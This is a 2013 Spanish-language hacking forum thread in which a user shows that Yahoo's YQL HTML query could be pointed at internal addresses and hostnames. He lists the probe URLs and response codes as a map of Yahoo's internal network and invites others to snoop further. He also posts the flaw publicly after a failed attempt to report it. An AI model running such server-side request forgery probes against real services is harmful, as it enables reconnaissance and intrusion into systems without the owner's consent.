elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Acceso a la red local del servidor de Yahoo a traves de Yahoo QL		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL  (Leído 8,748 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« en: 3 Julio 2013, 20:25 pm »
Vamos a convertirnos en trolls por un par de minutos y vamos a darle un vistazo a la consola QL de Yahoo la cual permite realizar multiples consultas a distintas apis de Yahoo pero a modo de SQL.

Ejemplo de una simple query:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show tables

Esto nos devolverá todas las tablas (servicios, apis).

Ahora probaremos utilizar la api HTML de la siguiente manera:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://foro.elhacker.net/"

Esto nos devolverá el contenido HTML parseado en XML.

Ahora que ya entendimos un poco sobre el funcionamiento de YQL vamos a trollear un poco:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"

Nos retornará:
Código
  1. <url ... http-status-code="502" http-status-message="Network is unreachable">http://192.168.1.1/</url>

Pero si intentamos entrar a la subred local 0.1: http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.0.1/"
Código
  1. <url ... http-status-code="403" http-status-message="Forbidden">http://192.168.0.1/</url>

Esto nos demuestra una cosa: que la api de peticiones HTTP no filtra ips ni dominios :D asi que podemos pasearnos por toda la red local si queremos ya que al intentar entrar a la puerta predeterminada de enlace (router o switch o lo que sea) nos arrojó un error 403 que probablemente haya retornado el panel de administración del router ya que cuando probamos con otras ips locales simplemente nos dice que es imposible conectarse (error 502 Cannot find server).

Probamos otras urls sensibles:
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403 (necesita autorización, ¿como?: buena pregunta)
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://admin/login/ : Timed out waiting for operation - failing node: memcache4.yql.bf1.yahoo.com/68.142.224.71:11211
http://68.142.224.71/ : 502 - Connection refused
http://local/ : 404 - Not Found Tenemos acceso a un servidor WEB local!
http://dev/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://developer/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

Información útil para comenzar a husmear dentro de los servidores locales de yahoo :)

Saludos.
« Última modificación: 3 Julio 2013, 20:28 pm por WHK » En línea
- https://yhojann.cl/ - https://whk.cl/
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #1 en: 4 Julio 2013, 11:15 am »
Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!
En línea





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #2 en: 4 Julio 2013, 14:43 pm »
Cita de: Søra en  4 Julio 2013, 11:15 am
Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!

Lo intenté pero para poder reportar un problema de seguridad debes saber ingles perfectamente (-1, no es mi lengua nativa) y a demás hay que pasar por toda una serie de formularios y registros (-2) que al final en ves de terminar reportando un bug terminan ellos desmoralizandote, algo así como sucede con las operadoras de movistar, despues de una hora recién puedes optar por hablar con alguien.

Asi que para que calentarme la cabeza, mejor lo posteo en el foro y ya, si con el tiempo alguien le saca provecho entonces recién se apresurarán a parcharlo, talves resulte mas rápido que intentar reportarlo.
« Última modificación: 4 Julio 2013, 14:45 pm por WHK » En línea
- https://yhojann.cl/ - https://whk.cl/
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #3 en: 9 Julio 2013, 15:06 pm »
Søra, ahi está tu respuesta:
 
Citar
Customer By Email (WHK Yan)   07/08/2013 07:49 AM
Hola, disculpe que no le escriba en ingles pero solamente se español.

He encontrad un problema de seguridad en Yahoo QL la cual podría permitir el acceso no autorizado a la red local.

Por ejemplo:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"
...
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://local/ : 404 - Not Found
http://dev/ : 404 - Not Found on Accelerator
http://developer/ : 404 - Not Found on Accelerator
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

No estoy seguro si en algún momento será posible acceder a algún servicio o poder burlar la api para poder ingresar a algún servidor local, pero si ha revelado información muy sensible sobre la estructura interna de los servidores. Por ejemplo un delincuente informático ya sería capaz de saber que el nivel de red local varía entre 192.168.0.x y podría realizar un barrido de ips escaneando todos los posibles puntos de accesos y preparar un ataque mas sofisticado comprometiendo la información confidencial que pueda almacenar cada uno o ls puntos que tengan acceso directo a el.

Saludos.

Response Via Email (Louise Carter)
Hi WHK,
 
Thanks for contacting Yahoo!.
 
The Yahoo! service that you have written about is targeted at a primarily English-speaking audience. Yahoo! is able to take appropriate action against content posted by users on Yahoo! services that may violate the Yahoo! Terms of Service
 
 We are currently unable to determine if the content posted on the site you wrote us about is in violation of the Yahoo! Terms of Service. If you believe that you may be in danger, please contact your local law enforcement agency immediately. Otherwise, forward a translation of the abusive material, and we will review the situation further and take appropriate action.
 
You can find some extra information about this (and other Yahoo! products) through Yahoo! Help Central.
 
Thanks again,
 
Louise Carter
 
Yahoo! Customer Care
En línea
- https://yhojann.cl/ - https://whk.cl/
greycore

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #4 en: 12 Julio 2013, 10:09 am »
Ya te lo han dicho claro, o lo traduces o nada xD

Parece mentira que no tengan soporte en español... pero vaya, ellos sabrán lo que hacen, si intentas comunicarte con ellos y te ponen tantas pegas, si después se usa ese problema de seguridad contra ellos no podrás decir que no lo intentaste.
En línea
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #5 en: 12 Julio 2013, 16:14 pm »
Y mira lo que me han respondido ahora:

Citar
We have not heard from you concerning your request for support in the 72 hours since we sent you a response. Consequently, we have changed the status of your question to SOLVED.

xDDDD seeeeeeeh está muy resuelto xD
En línea
- https://yhojann.cl/ - https://whk.cl/
Søra

Desconectado Desconectado

Mensajes: 260

"Piensa por ti mismo"Antifascismo Antiracismo


Ver Perfil
Re: Acceso a la red local del servidor de Yahoo a traves de Yahoo QL
« Respuesta #6 en: 14 Julio 2013, 13:07 pm »
Jajajajaajaj, por lo menos tienen sentido del humor :D
En línea





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Yahoo y Google sospechan que la NSA accedió a sus centros de datos a través ...
Noticias 		wolfbcn 2 1,511 Último mensaje 27 Noviembre 2013, 15:17 pm
por daryo
Web service y acceso desde un servidor no local
Desarrollo Web 		jabedoya 7 4,357 Último mensaje 31 Mayo 2014, 19:40 pm
por engel lex
Yahoo bloquea el acceso a su email si usas Adblock
Noticias 		wolfbcn 0 1,083 Último mensaje 20 Noviembre 2015, 22:26 pm
por wolfbcn
¿msn search y yahoo me tumbaron mi servidor por 10 minutos? « 1 2 »
Seguridad 		Platanito Mx 10 6,146 Último mensaje 1 Marzo 2016, 17:23 pm
por Platanito Mx
Descifrar Yahoo de Amigo Desaparecido
Hacking 		Dirty Paws 4 4,009 Último mensaje 25 Mayo 2021, 12:01 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines